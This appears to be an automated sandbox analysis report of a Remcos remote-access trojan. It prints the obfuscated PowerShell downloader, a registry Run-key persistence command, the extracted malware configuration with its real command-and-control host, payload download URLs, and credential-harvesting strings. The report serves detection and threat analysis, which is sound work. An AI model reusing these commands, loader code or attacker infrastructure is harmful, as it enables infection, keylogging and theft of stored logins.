              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2996, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", ProcessId: 6964, ProcessName: cmd.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSel

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 54 18 23 A9 DF 30 C1 62 3F FE C6 67 DF 31 E3 CA B8 49 EC 9B 9A F7 7A 8F 6F 70 26 31 99 50 27 05 10 98 5A 30 67 87 B3 7C FF C1 91 CB 52 7E 91 DD F9 21 12 00 5D BA A1 22 8B FF D0 C8 BA F2 59 C1 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 2996, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-MC4T64\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-22T09:40:42.309016+020020365941Malware Command and Control Activity Detected192.168.2.649881143.244.46.15051525TCP
              2024-10-22T09:40:44.230804+020020365941Malware Command and Control Activity Detected192.168.2.649892143.244.46.15051525TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-22T09:40:43.893685+020028033043Unknown Traffic192.168.2.649893178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-22T09:40:36.573377+020028032702Potentially Bad Traffic192.168.2.649846104.21.56.189443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["pikolee.duckdns.org:51525:1"], "Assigned name": "power", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MC4T64", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:49846 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2417345393.0000000008268000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 00000010.00000002.2590132545.0000000002DC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2410836893.0000000007247000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb0 source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_21BD10F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD6580 FindFirstFileExA,9_2_21BD6580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49881 -> 143.244.46.150:51525
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49892 -> 143.244.46.150:51525
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: pikolee.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: pikolee.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.6:49881 -> 143.244.46.150:51525
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49893 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49846 -> 104.21.56.189:443
              Source: global trafficHTTP traffic detected: GET /Kvalificeredes.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dUEhUdoBD66.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Kvalificeredes.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dUEhUdoBD66.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 00000009.00000002.4597306369.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000F.00000002.2597692373.00000000047D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000F.00000002.2597692373.00000000047D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 00000009.00000002.4597777003.0000000022420000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000009.00000002.4597777003.0000000022420000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: plieltd.top
              Source: global trafficDNS traffic detected: DNS query: pikolee.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005EDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F04000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2540195237.0000000005FBB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, bhv6E57.tmp.15.drString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp#
              Source: msiexec.exe, 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp4
              Source: msiexec.exe, 00000009.00000003.2540195237.0000000005FBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpalo
              Source: msiexec.exe, 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gplA
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
              Source: powershell.exe, 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: powershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2235185548.000002440A1E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://plieltd.top
              Source: powershell.exe, 00000002.00000002.2235185548.0000024408461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2380563936.00000000046C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv6E57.tmp.15.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: msiexec.exe, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, msiexec.exe, 00000012.00000003.2575617457.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575587073.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2583210513.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575637815.0000000002D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 00000009.00000002.4597306369.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 00000012.00000003.2575617457.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575587073.0000000002D8D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.2583210513.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2575637815.0000000002D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
              Source: msiexec.exe, 00000009.00000002.4597306369.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: msiexec.exe, 0000000F.00000002.2596870063.00000000027E4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net~
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: powershell.exe, 00000002.00000002.2235185548.0000024408461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2380563936.00000000046C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
